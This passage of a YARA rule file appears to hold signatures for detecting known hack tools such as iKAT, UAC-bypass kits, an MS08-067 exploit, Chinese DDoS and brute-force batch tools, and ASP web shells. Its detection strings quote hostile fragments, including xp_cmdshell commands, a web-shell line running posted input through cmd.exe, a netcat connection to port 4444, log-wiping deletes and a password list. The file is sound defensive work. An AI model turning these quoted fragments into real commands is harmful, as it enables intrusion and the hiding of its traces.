    $s20 = "Set ts = fso.createtextfile (\"wDw00t.xml\")" ascii fullword
  condition:
    2 of them
}

rule iKAT_command_lines_agent {
  meta:
    description = "iKAT hack tools set agent - file ikat.exe"
    author = "Florian Roth"
    date = "05.11.14"
    score = 75
    reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
    hash = "c802ee1e49c0eae2a3fc22d2e82589d857f96d94"
  strings:
    $s0 = "Extended Module: super mario brothers" ascii fullword
    $s1 = "Extended Module: " ascii fullword
    $s3 = "ofpurenostalgicfeeling" ascii fullword
    $s8 = "-supermariobrotheretic" ascii fullword
    $s9 = "!http://132.147.96.202:80" ascii fullword
    $s12 = "iKAT Exe Template" ascii fullword
    $s15 = "withadancyflavour.." ascii fullword
    $s16 = "FastTracker v2.00   " ascii fullword
  condition:
    4 of them
}

rule iKAT_cmd_as_dll {
  meta:
    description = "iKAT toolset file cmd.dll ReactOS file cloaked"
    author = "Florian Roth"
    date = "05.11.14"
    score = 65
    reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
    hash = "b5d0ba941efbc3b5c97fe70f70c14b2050b8336a"
  strings:
    $s1 = "cmd.exe" wide fullword
    $s2 = "ReactOS Development Team" wide fullword
    $s3 = "ReactOS Command Processor" wide fullword
    $ext = "extension: .dll" nocase
  condition:
    all of ($s*) and $ext
}

rule iKAT_tools_nmap {
  meta:
    description = "Generic rule for NMAP - based on NMAP 4 standalone"
    author = "Florian Roth"
    date = "05.11.14"
    score = 50
    reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
    hash = "d0543f365df61e6ebb5e345943577cc40fca8682"
  strings:
    $s0 = "Insecure.Org" wide fullword
    $s1 = "Copyright (c) Insecure.Com" wide fullword
    $s2 = "nmap" nocase fullword
    $s3 = "Are you alert enough to be using Nmap?  Have some coffee or Jolt(tm)." ascii
  condition:
    all of them
}

rule iKAT_startbar {
  meta:
    description = "Tool to hide unhide the windows startbar from command line - iKAT hack tools - file startbar.exe"
    author = "Florian Roth"
    date = "05.11.14"
    score = 50
    reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
    hash = "0cac59b80b5427a8780168e1b85c540efffaf74f"
  strings:
    $s2 = "Shinysoft Limited1" ascii fullword
    $s3 = "Shinysoft Limited0" ascii fullword
    $s4 = "Wellington1" ascii fullword
    $s6 = "Wainuiomata1" ascii fullword
    $s8 = "56 Wright St1" ascii fullword
    $s9 = "UTN-USERFirst-Object" ascii fullword
    $s10 = "New Zealand1" ascii fullword
  condition:
    all of them
}

rule iKAT_gpdisable_customcmd_kitrap0d_uacpoc {
  meta:
    description = "iKAT hack tool set generic rule - from files gpdisable.exe, customcmd.exe, kitrap0d.exe, uacpoc.exe"
    author = "Florian Roth"
    date = "05.11.14"
    reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
    super_rule = 1
    hash0 = "814c126f21bc5e993499f0c4e15b280bf7c1c77f"
    hash1 = "2725690954c2ad61f5443eb9eec5bd16ab320014"
    hash2 = "75f5aed1e719443a710b70f2004f34b2fe30f2a9"
    hash3 = "b65a460d015fd94830d55e8eeaf6222321e12349"
    score = 20
  strings:
    $s0 = "Failed to get temp file for source AES decryption" fullword
    $s5 = "Failed to get encryption header for pwd-protect" fullword
    $s17 = "Failed to get filetime" fullword
    $s20 = "Failed to delete temp file for password decoding (3)" fullword
  condition:
    all of them
}

rule iKAT_Tool_Generic {
  meta:
    description = "Generic Rule for hack tool iKAT files gpdisable.exe, kitrap0d.exe, uacpoc.exe"
    author = "Florian Roth"
    date = "05.11.14"
    score = 55
    reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
    super_rule = 1
    hash0 = "814c126f21bc5e993499f0c4e15b280bf7c1c77f"
    hash1 = "75f5aed1e719443a710b70f2004f34b2fe30f2a9"
    hash2 = "b65a460d015fd94830d55e8eeaf6222321e12349"
  strings:
    $s0 = "<IconFile>C:\\WINDOWS\\App.ico</IconFile>" fullword
    $s1 = "Failed to read the entire file" fullword
    $s4 = "<VersionCreatedBy>14.4.0</VersionCreatedBy>" fullword
    $s8 = "<ProgressCaption>Run &quot;executor.bat&quot; once the shell has spawned.</P"
    $s9 = "Running Zip pipeline..." fullword
    $s10 = "<FinTitle />" fullword
    $s12 = "<AutoTemp>0</AutoTemp>" fullword
    $s14 = "<DefaultDir>%TEMP%</DefaultDir>" fullword
    $s15 = "AES Encrypting..." fullword
    $s20 = "<UnzipDir>%TEMP%</UnzipDir>" fullword
  condition:
    all of them
}

rule BypassUac2 {
  meta:
    description = "Auto-generated rule - file BypassUac2.zip"
    author = "yarGen Yara Rule Generator"
    hash = "ef3e7dd2d1384ecec1a37254303959a43695df61"
  strings:
    $s0 = "/BypassUac/BypassUac/BypassUac_Utils.cpp" ascii fullword
    $s1 = "/BypassUac/BypassUacDll/BypassUacDll.aps" ascii fullword
    $s3 = "/BypassUac/BypassUac/BypassUac.ico" ascii fullword
  condition:
    all of them
}

rule BypassUac_3 {
  meta:
    description = "Auto-generated rule - file BypassUacDll.dll"
    author = "yarGen Yara Rule Generator"
    hash = "1974aacd0ed987119999735cad8413031115ce35"
  strings:
    $s0 = "BypassUacDLL.dll" wide fullword
    $s1 = "\\Release\\BypassUacDll" ascii
    $s3 = "Win7ElevateDLL" wide fullword
    $s7 = "BypassUacDLL" wide fullword
  condition:
    3 of them
}

rule BypassUac_9 {
  meta:
    description = "Auto-generated rule - file BypassUac.zip"
    author = "yarGen Yara Rule Generator"
    hash = "93c2375b2e4f75fc780553600fbdfd3cb344e69d"
  strings:
    $s0 = "/x86/BypassUac.exe" ascii fullword
    $s1 = "/x64/BypassUac.exe" ascii fullword
    $s2 = "/x86/BypassUacDll.dll" ascii fullword
    $s3 = "/x64/BypassUacDll.dll" ascii fullword
    $s15 = "BypassUac" ascii fullword
  condition:
    all of them
}

rule BypassUacDll_6 {
  meta:
    description = "Auto-generated rule - file BypassUacDll.aps"
    author = "yarGen Yara Rule Generator"
    hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
  strings:
    $s3 = "BypassUacDLL.dll" wide fullword
    $s4 = "AFX_IDP_COMMAND_FAILURE" ascii fullword
  condition:
    all of them
}

rule BypassUacDll_7 {
  meta:
    description = "Auto-generated rule - file BypassUacDll.aps"
    author = "yarGen Yara Rule Generator"
    hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
  strings:
    $s3 = "BypassUacDLL.dll" wide fullword
    $s4 = "AFX_IDP_COMMAND_FAILURE" ascii fullword
  condition:
    all of them
}

rule BypassUac_EXE {
  meta:
    description = "Auto-generated rule - file BypassUacDll.aps"
    author = "yarGen Yara Rule Generator"
    hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
  strings:
    $s1 = "Wole32.dll" wide
    $s3 = "System32\\migwiz" wide
    $s4 = "System32\\migwiz\\CRYPTBASE.dll" wide
    $s5 = "Elevation:Administrator!new:" wide
    $s6 = "BypassUac" wide
  condition:
    all of them
}

rule APT_Proxy_Malware_Packed_dev {
  meta:
    author = "FRoth"
    date = "2014-11-10"
    description = "APT Malware - Proxy"
    hash = "6b6a86ceeab64a6cb273debfa82aec58"
    score = 50
  strings:
    $string0 = "PECompact2" fullword
    $string1 = "[LordPE]"
    $string2 = "steam_ker.dll"
  condition:
    all of them
}

rule Tzddos_DDoS_Tool_CN {
  meta:
    description = "Disclosed hacktool set - file tzddos"
    author = "Florian Roth"
    date = "17.11.14"
    score = 60
    hash = "d4c517eda5458247edae59309453e0ae7d812f8e"
  strings:
    $s0 = "for /f %%a in (host.txt) do (" ascii fullword
    $s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" ascii fullword
    $s2 = "del host.txt /q" ascii fullword
    $s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" ascii fullword
    $s4 = "start Http.exe %%a %http%" ascii fullword
    $s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" ascii fullword
    $s6 = "del Result.txt s2.txt s1.txt " ascii fullword
  condition:
    all of them
}

rule Ncat_Hacktools_CN {
  meta:
    description = "Disclosed hacktool set - file nc.exe"
    author = "Florian Roth"
    date = "17.11.14"
    score = 60
    hash = "001c0c01c96fa56216159f83f6f298755366e528"
  strings:
    $s0 = "nc -l -p port [options] [hostname] [port]" ascii fullword
    $s2 = "nc [-options] hostname port[s] [ports] ... " ascii fullword
    $s3 = "gethostpoop fuxored" ascii fullword
    $s6 = "VERNOTSUPPORTED" ascii fullword
    $s7 = "%s [%s] %d (%s)" ascii fullword
    $s12 = " `--%s' doesn't allow an argument" ascii fullword
  condition:
    all of them
}

rule MS08_067_Exploit_Hacktools_CN {
  meta:
    description = "Disclosed hacktool set - file cs.exe"
    author = "Florian Roth"
    date = "17.11.14"
    score = 60
    hash = "a3e9e0655447494253a1a60dbc763d9661181322"
  strings:
    $s0 = "MS08-067 Exploit for CN by EMM@ph4nt0m.org" ascii fullword
    $s3 = "Make SMB Connection error:%d" ascii fullword
    $s5 = "Send Payload Over!" ascii fullword
    $s7 = "Maybe Patched!" ascii fullword
    $s8 = "RpcExceptionCode() = %u" ascii fullword
    $s11 = "ph4nt0m" wide fullword
    $s12 = "\\\\%s\\IPC" ascii
  condition:
    4 of them
}

rule Hacktools_CN_Burst_sql {
  meta:
    description = "Disclosed hacktool set - file sql.exe"
    author = "Florian Roth"
    date = "17.11.14"
    score = 60
    hash = "d5139b865e99b7a276af7ae11b14096adb928245"
  strings:
    $s0 = "s.exe %s %s %s %s %d /save" ascii fullword
    $s2 = "s.exe start error...%d" ascii fullword
    $s4 = "EXEC sp_addextendedproc xp_cmdshell,'xplog70.dll'" ascii fullword
    $s7 = "EXEC master..xp_cmdshell 'wscript.exe cc.js'" ascii fullword
    $s10 = "Result.txt" ascii fullword
    $s11 = "Usage:sql.exe [options]" ascii fullword
    $s17 = "%s root %s %d error" ascii fullword
    $s18 = "Pass.txt" ascii fullword
    $s20 = "SELECT sillyr_at_gmail_dot_com INTO DUMPFILE '%s\\\\sillyr_x.so' FROM sillyr_x" ascii fullword
  condition:
    6 of them
}

rule Hacktools_CN_Panda_445TOOL {
  meta:
    description = "Disclosed hacktool set - file 445TOOL.rar"
    author = "Florian Roth"
    date = "17.11.14"
    score = 60
    hash = "92050ba43029f914696289598cf3b18e34457a11"
  strings:
    $s0 = "scan.bat" ascii fullword
    $s1 = "Http.exe" ascii fullword
    $s2 = "GOGOGO.bat" ascii fullword
    $s3 = "ip.txt" ascii fullword
  condition:
    all of them
}

rule Hacktools_CN_Panda_445 {
  meta:
    description = "Disclosed hacktool set - file 445.rar"
    author = "Florian Roth"
    date = "17.11.14"
    score = 60
    hash = "a61316578bcbde66f39d88e7fc113c134b5b966b"
  strings:
    $s0 = "for /f %%i in (ips.txt) do (start cmd.bat %%i)" ascii fullword
    $s1 = "445\\nc.exe" ascii fullword
    $s2 = "445\\s.exe" ascii fullword
    $s3 = "cs.exe %1" ascii fullword
    $s4 = "445\\cs.exe" ascii fullword
    $s5 = "445\\ip.txt" ascii fullword
    $s6 = "445\\cmd.bat" ascii fullword
    $s9 = "@echo off" ascii fullword
  condition:
    all of them
}

rule Hacktools_CN_WinEggDrop {
  meta:
    description = "Disclosed hacktool set - file s.exe"
    author = "Florian Roth"
    date = "17.11.14"
    score = 60
    hash = "7665011742ce01f57e8dc0a85d35ec556035145d"
  strings:
    $s0 = "Normal Scan: About To Scan %u IP For %u Ports Using %d Thread" ascii fullword
    $s2 = "SYN Scan: About To Scan %u IP For %u Ports Using %d Thread" ascii fullword
    $s6 = "Example: %s TCP 12.12.12.12 12.12.12.254 21 512 /Banner" ascii fullword
    $s8 = "Something Wrong About The Ports" ascii fullword
    $s9 = "Performing Time: %d/%d/%d %d:%d:%d --> " ascii fullword
    $s10 = "Example: %s TCP 12.12.12.12/24 80 512 /T8 /Save" ascii fullword
    $s12 = "%u Ports Scanned.Taking %d Threads " ascii fullword
    $s13 = "%-16s %-5d -> \"%s\"" ascii fullword
    $s14 = "SYN Scan Can Only Perform On WIN 2K Or Above" ascii fullword
    $s17 = "SYN Scan: About To Scan %s:%d Using %d Thread" ascii fullword
    $s18 = "Scan %s Complete In %d Hours %d Minutes %d Seconds. Found %u Open Ports" ascii fullword
  condition:
    5 of them
}

rule Hacktools_CN_Scan_BAT {
  meta:
    description = "Disclosed hacktool set - file scan.bat"
    author = "Florian Roth"
    date = "17.11.14"
    score = 60
    hash = "6517d7c245f1300e42f7354b0fe5d9666e5ce52a"
  strings:
    $s0 = "for /f %%a in (host.txt) do (" ascii fullword
    $s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" ascii fullword
    $s2 = "del host.txt /q" ascii fullword
    $s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" ascii fullword
    $s4 = "start Http.exe %%a %http%" ascii fullword
    $s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" ascii fullword
  condition:
    5 of them
}

rule Hacktools_CN_Panda_Burst {
  meta:
    description = "Disclosed hacktool set - file Burst.rar"
    author = "Florian Roth"
    date = "17.11.14"
    score = 60
    hash = "ce8e3d95f89fb887d284015ff2953dbdb1f16776"
  strings:
    $s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr." ascii
  condition:
    all of them
}

rule Hacktools_CN_445_cmd {
  meta:
    description = "Disclosed hacktool set - file cmd.bat"
    author = "Florian Roth"
    date = "17.11.14"
    score = 60
    hash = "69b105a3aec3234819868c1a913772c40c6b727a"
  strings:
    $bat = "@echo off" ascii fullword
    $s0 = "cs.exe %1" ascii fullword
    $s2 = "nc %1 4444" ascii fullword
  condition:
    $bat at 0 and all of ($s*)
}

rule Hacktools_CN_GOGOGO_Bat {
  meta:
    description = "Disclosed hacktool set - file GOGOGO.bat"
    author = "Florian Roth"
    date = "17.11.14"
    score = 60
    hash = "4bd4f5b070acf7fe70460d7eefb3623366074bbd"
  strings:
    $s0 = "for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%x" ascii fullword
    $s1 = "http://www.tzddos.com/ -------------------------------------------->byebye.txt" ascii fullword
    $s2 = "ren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bak" ascii fullword
    $s4 = "IF /I \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )" ascii fullword
    $s5 = "copy *.tzddos scan.bat&del *.tzddos" ascii fullword
    $s6 = "del /f tcpip.sys" ascii fullword
    $s9 = "if /i \"%CB%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )" ascii fullword
    $s10 = "call scan.bat" ascii fullword
    $s12 = "IF /I \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )" ascii fullword
    $s13 = "IF /I \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )" ascii fullword
    $s18 = "sc config LmHosts start= auto" ascii fullword
    $s19 = "copy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nul" ascii fullword
    $s20 = "ren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak" ascii fullword
  condition:
    3 of them
}

rule Hacktools_CN_Burst_pass {
  meta:
    description = "Disclosed hacktool set - file pass.txt"
    author = "Florian Roth"
    date = "17.11.14"
    score = 60
    hash = "55a05cf93dbd274355d798534be471dff26803f9"
  strings:
    $s0 = "123456.com" ascii fullword
    $s1 = "123123.com" ascii fullword
    $s2 = "360.com" ascii fullword
    $s3 = "123.com" ascii fullword
    $s4 = "juso.com" ascii fullword
    $s5 = "sina.com" ascii fullword
    $s7 = "changeme" ascii fullword
    $s8 = "master" ascii fullword
    $s9 = "google.com" ascii fullword
    $s10 = "chinanet" ascii fullword
    $s12 = "lionking" ascii fullword
  condition:
    all of them
}

rule Hacktools_CN_JoHor_Posts_Killer {
  meta:
    description = "Disclosed hacktool set - file JoHor_Posts_Killer.exe"
    author = "Florian Roth"
    date = "17.11.14"
    score = 60
    hash = "d157f9a76f9d72dba020887d7b861a05f2e56b6a"
  strings:
    $s0 = "Multithreading Posts_Send Killer" ascii fullword
    $s3 = "GET [Access Point] HTTP/1.1" ascii fullword
    $s6 = "The program's need files was not exist!" ascii fullword
    $s7 = "JoHor_Posts_Killer" wide fullword
    $s8 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" ascii fullword
    $s10 = "  ( /s ) :" ascii fullword
    $s11 = "forms.vbp" ascii fullword
    $s12 = "forms.vcp" ascii fullword
    $s13 = "Software\\FlySky\\E\\Install" ascii fullword
  condition:
    5 of them
}

rule Hacktools_CN_Panda_tesksd {
  meta:
    description = "Disclosed hacktool set - file tesksd.jpg"
    author = "Florian Roth"
    date = "17.11.14"
    score = 60
    hash = "922147b3e1e6cf1f5dd5f64a4e34d28bdc9128cb"
  strings:
    $s0 = "name=\"Microsoft.Windows.Common-Controls\" " ascii fullword
    $s1 = "ExeMiniDownload.exe" wide fullword
    $s16 = "POST %Hs" ascii fullword
  condition:
    all of them
}

rule Hacktools_CN_Http {
  meta:
    description = "Disclosed hacktool set - file Http.exe"
    author = "Florian Roth"
    date = "17.11.14"
    score = 60
    hash = "788bf0fdb2f15e0c628da7056b4e7b1a66340338"
  strings:
    $s0 = "RPCRT4.DLL" ascii fullword
    $s1 = "WNetAddConnection2A" ascii fullword
    $s2 = "NdrPointerBufferSize" ascii fullword
    $s3 = "_controlfp" ascii fullword
  condition:
    all of them and filesize < 10240
}

rule Hacktools_CN_Burst_Start {
  meta:
    description = "Disclosed hacktool set - file Start.bat - DoS tool"
    author = "Florian Roth"
    date = "17.11.14"
    score = 60
    hash = "75d194d53ccc37a68286d246f2a84af6b070e30c"
  strings:
    $s0 = "for /f \"eol= tokens=1,2 delims= \" %%i in (ip.txt) do (" ascii fullword
    $s1 = "Blast.bat /r 600" ascii fullword
    $s2 = "Blast.bat /l Blast.bat" ascii fullword
    $s3 = "Blast.bat /c 600" ascii fullword
    $s4 = "start Clear.bat" ascii fullword
    $s5 = "del Result.txt" ascii fullword
    $s6 = "s syn %%i %%j 3306 /save" ascii fullword
    $s7 = "start Thecard.bat" ascii fullword
    $s10 = "setlocal enabledelayedexpansion" ascii fullword
  condition:
    5 of them
}

rule Hacktools_CN_Panda_tasksvr {
  meta:
    description = "Disclosed hacktool set - file tasksvr.exe"
    author = "Florian Roth"
    date = "17.11.14"
    score = 60
    hash = "a73fc74086c8bb583b1e3dcfd326e7a383007dc0"
  strings:
    $s2 = "Consys21.dll" ascii fullword
    $s4 = "360EntCall.exe" wide fullword
    $s15 = "Beijing1" ascii fullword
  condition:
    all of them
}

rule Hacktools_CN_Burst_Clear {
  meta:
    description = "Disclosed hacktool set - file Clear.bat"
    author = "Florian Roth"
    date = "17.11.14"
    score = 60
    hash = "148c574a4e6e661aeadaf3a4c9eafa92a00b68e4"
  strings:
    $s0 = "del /f /s /q %systemdrive%\\*.log    " ascii fullword
    $s1 = "del /f /s /q %windir%\\*.bak    " ascii fullword
    $s4 = "del /f /s /q %systemdrive%\\*.chk    " ascii fullword
    $s5 = "del /f /s /q %systemdrive%\\*.tmp    " ascii fullword
    $s8 = "del /f /q %userprofile%\\COOKIES s\\*.*    " ascii fullword
    $s9 = "rd /s /q %windir%\\temp & md %windir%\\temp    " ascii fullword
    $s11 = "del /f /s /q %systemdrive%\\recycled\\*.*    " ascii fullword
    $s12 = "del /f /s /q \"%userprofile%\\Local Settings\\Temp\\*.*\"    " ascii fullword
    $s19 = "del /f /s /q \"%userprofile%\\Local Settings\\Temporary Internet Files\\*.*\"   " ascii
  condition:
    5 of them
}

rule Hacktools_CN_Burst_Thecard {
  meta:
    description = "Disclosed hacktool set - file Thecard.bat"
    author = "Florian Roth"
    date = "17.11.14"
    score = 60
    hash = "50b01ea0bfa5ded855b19b024d39a3d632bacb4c"
  strings:
    $s0 = "tasklist |find \"Clear.bat\"||start Clear.bat" ascii fullword
    $s1 = "Http://www.coffeewl.com" ascii fullword
    $s2 = "ping -n 2 localhost 1>nul 2>nul" ascii fullword
    $s3 = "for /L %%a in (" ascii fullword
    $s4 = "MODE con: COLS=42 lines=5" ascii fullword
  condition:
    all of them
}

rule Hacktools_CN_Burst_Blast {
  meta:
    description = "Disclosed hacktool set - file Blast.bat"
    author = "Florian Roth"
    date = "17.11.14"
    score = 60
    hash = "b07702a381fa2eaee40b96ae2443918209674051"
  strings:
    $s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http:" ascii
    $s1 = "@echo off" ascii fullword
  condition:
    all of them
}

rule VUBrute_VUBrute {
  meta:
    description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file VUBrute.exe"
    author = "Florian Roth"
    date = "22.11.14"
    score = 70
    hash = "166fa8c5a0ebb216c832ab61bf8872da556576a7"
  strings:
    $s0 = "Text Files (*.txt);;All Files (*)" ascii fullword
    $s1 = "http://ubrute.com" ascii fullword
    $s11 = "IP - %d; Password - %d; Combination - %d" ascii fullword
    $s14 = "error.txt" ascii fullword
  condition:
    all of them
}

rule DK_Brute {
  meta:
    description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file DK Brute.exe"
    author = "Florian Roth"
    date = "22.11.14"
    score = 70
    reference = "http://goo.gl/xiIphp"
    hash = "93b7c3a01c41baecfbe42461cb455265f33fbc3d"
  strings:
    $s6 = "get_CrackedCredentials" ascii fullword
    $s13 = "Same port used for two different protocols:" wide fullword
    $s18 = "coded by fLaSh" ascii fullword
    $s19 = "get_grbToolsScaningCracking" ascii fullword
  condition:
    all of them
}

rule VUBrute_config {
  meta:
    description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file config.ini"
    author = "Florian Roth"
    date = "22.11.14"
    score = 70
    reference = "http://goo.gl/xiIphp"
    hash = "b9f66b9265d2370dab887604921167c11f7d93e9"
  strings:
    $s2 = "Restore=1" ascii fullword
    $s6 = "Thread=" ascii
    $s7 = "Running=1" ascii fullword
    $s8 = "CheckCombination=" ascii fullword
    $s10 = "AutoSave=1.000000" ascii fullword
    $s12 = "TryConnect=" ascii
    $s13 = "Tray=" ascii
  condition:
    all of them
}

rule sig_238_hunt {
  meta:
    description = "Disclosed hacktool set (old stuff) - file hunt.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "f9f059380d95c7f8d26152b1cb361d93492077ca"
  strings:
    $s1 = "Programming by JD Glaser - All Rights Reserved" ascii fullword
    $s3 = "Usage - hunt \\\\servername" ascii fullword
    $s4 = ".share = %S - %S" wide fullword
    $s5 = "SMB share enumerator and admin finder " ascii fullword
    $s7 = "Hunt only runs on Windows NT..." ascii fullword
    $s8 = "User = %S" ascii fullword
    $s9 = "Admin is %s\\%s" ascii fullword
  condition:
    all of them
}

rule sig_238_listip {
  meta:
    description = "Disclosed hacktool set (old stuff) - file listip.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "f32a0c5bf787c10eb494eb3b83d0c7a035e7172b"
  strings:
    $s0 = "ERROR!!! Bad host lookup. Program Terminate." ascii fullword
    $s2 = "ERROR No.2!!! Program Terminate." ascii fullword
    $s4 = "Local Host Name: %s" ascii fullword
    $s5 = "Packed by exe32pack 1.38" ascii fullword
    $s7 = "Local Computer Name: %s" ascii fullword
    $s8 = "Local IP Adress: %s" ascii fullword
  condition:
    all of them
}

rule ArtTrayHookDll {
  meta:
    description = "Disclosed hacktool set (old stuff) - file ArtTrayHookDll.dll"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "4867214a3d96095d14aa8575f0adbb81a9381e6c"
  strings:
    $s0 = "ArtTrayHookDll.dll" ascii fullword
    $s7 = "?TerminateHook@@YAXXZ" ascii fullword
  condition:
    all of them
}

rule sig_238_eee {
  meta:
    description = "Disclosed hacktool set (old stuff) - file eee.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "236916ce2980c359ff1d5001af6dacb99227d9cb"
  strings:
    $s0 = "szj1230@yesky.com" wide fullword
    $s3 = "C:\\Program Files\\DevStudio\\VB\\VB5.OLB" ascii fullword
    $s4 = "MailTo:szj1230@yesky.com" wide fullword
    $s5 = "Command1_Click" ascii fullword
    $s7 = "software\\microsoft\\internet explorer\\typedurls" wide fullword
    $s11 = "vb5chs.dll" ascii fullword
    $s12 = "MSVBVM50.DLL" ascii fullword
  condition:
    all of them
}

rule aspbackdoor_asp4 {
  meta:
    description = "Disclosed hacktool set (old stuff) - file asp4.txt"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "faf991664fd82a8755feb65334e5130f791baa8c"
  strings:
    $s0 = "system.dll" ascii fullword
    $s2 = "set sys=server.CreateObject (\"system.contral\") " ascii fullword
    $s3 = "Public Function reboot(atype As Variant)" ascii fullword
    $s4 = "t& = ExitWindowsEx(1, atype)" ascii
    $s5 = "atype=request(\"atype\") " ascii fullword
    $s7 = "AceiveX dll" ascii fullword
    $s8 = "Declare Function ExitWindowsEx Lib \"user32\" (ByVal uFlags As Long, ByVal " ascii
    $s10 = "sys.reboot(atype)" ascii fullword
  condition:
    all of them
}

rule aspfile1 {
  meta:
    description = "Disclosed hacktool set (old stuff) - file aspfile1.asp"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "77b1e3a6e8f67bd6d16b7ace73dca383725ac0af"
  strings:
    $s0 = "' -- check for a command that we have posted -- '" ascii fullword
    $s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" ascii fullword
    $s5 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"><BODY>" ascii fullword
    $s6 = "<input type=text name=\".CMD\" size=45 value=\"<%= szCMD %>\">" ascii fullword
    $s8 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" ascii fullword
    $s15 = "szCMD = Request.Form(\".CMD\")" ascii fullword
  condition:
    3 of them
}

rule EditServer_HackTool {
  meta:
    description = "Disclosed hacktool set (old stuff) - file EditServer.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "87b29c9121cac6ae780237f7e04ee3bc1a9777d3"
  strings:
    $s0 = "%s Server.exe" ascii fullword
    $s1 = "Service Port: %s" ascii fullword
    $s2 = "The Port Must Been >0 & <65535" ascii fullword
    $s8 = "3--Set Server Port" ascii fullword
    $s9 = "The Server Password Exceeds 32 Characters" ascii fullword
    $s13 = "Service Name: %s" ascii fullword
    $s14 = "Server Password: %s" ascii fullword
    $s17 = "Inject Process Name: %s" ascii fullword
    $x1 = "WinEggDrop Shell Congirator" ascii fullword
  condition:
    5 of ($s*) or $x1
}

rule sig_238_letmein {
  meta:
    description = "Disclosed hacktool set (old stuff) - file letmein.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "74d223a56f97b223a640e4139bb9b94d8faa895d"
  strings:
    $s1 = "Error get globalgroup memebers: NERR_InvalidComputer" ascii fullword
    $s6 = "Error get users from server!" ascii fullword
    $s7 = "get in nt by name and null" ascii fullword
    $s16 = "get something from nt, hold by killusa." ascii fullword
  condition:
    all of them
}

rule sig_238_token {
  meta:
    description = "Disclosed hacktool set (old stuff) - file token.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "c52bc6543d4281aa75a3e6e2da33cfb4b7c34b14"
  strings:
    $s0 = "Logon.exe" ascii fullword
    $s1 = "Domain And User:" ascii fullword
    $s2 = "PID=Get Addr$(): One" ascii fullword
    $s3 = "Process " ascii fullword
    $s4 = "psapi.dllK" ascii fullword
  condition:
    all of them
}

rule sig_238_TELNET {
  meta:
    description = "Disclosed hacktool set (old stuff) - file TELNET.EXE from Windows ME"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "50d02d77dc6cc4dc2674f90762a2622e861d79b1"
  strings:
    $s0 = "TELNET [host [port]]" wide fullword
    $s2 = "TELNET.EXE" wide fullword
    $s4 = "Microsoft(R) Windows(R) Millennium Operating System" wide fullword
    $s14 = "Software\\Microsoft\\Telnet" wide fullword
  condition:
    all of them
}

rule snifferport {
  meta:
    description = "Disclosed hacktool set (old stuff) - file snifferport.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "d14133b5eaced9b7039048d0767c544419473144"
  strings:
    $s0 = "iphlpapi.DLL" ascii fullword
    $s5 = "ystem\\CurrentCorolSet\\" ascii fullword
    $s11 = "Port.TX" ascii fullword
    $s12 = "32Next" ascii fullword
    $s13 = "V1.2 B" ascii fullword
  condition:
    all of them
}

rule sig_238_webget {
  meta:
    description = "Disclosed hacktool set (old stuff) - file webget.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "36b5a5dee093aa846f906bbecf872a4e66989e42"
  strings:
    $s0 = "Packed by exe32pack" ascii
    $s1 = "GET A HTTP/1.0" ascii fullword
    $s2 = " error " ascii fullword
    $s13 = "Downloa" ascii
  condition:
    all of them
}

rule XYZCmd_zip_Folder_XYZCmd {
  meta:
    description = "Disclosed hacktool set (old stuff) - file XYZCmd.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "bbea5a94950b0e8aab4a12ad80e09b630dd98115"
  strings:
    $s0 = "Executes Command Remotely" wide fullword
    $s2 = "XYZCmd.exe" wide fullword
    $s6 = "No Client Software" wide fullword
    $s19 = "XYZCmd V1.0 For NT S" ascii fullword
  condition:
    all of them
}

rule ASPack_Chinese {
  meta:
    description = "Disclosed hacktool set (old stuff) - file ASPack Chinese.ini"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "02a9394bc2ec385876c4b4f61d72471ac8251a8e"
  strings:
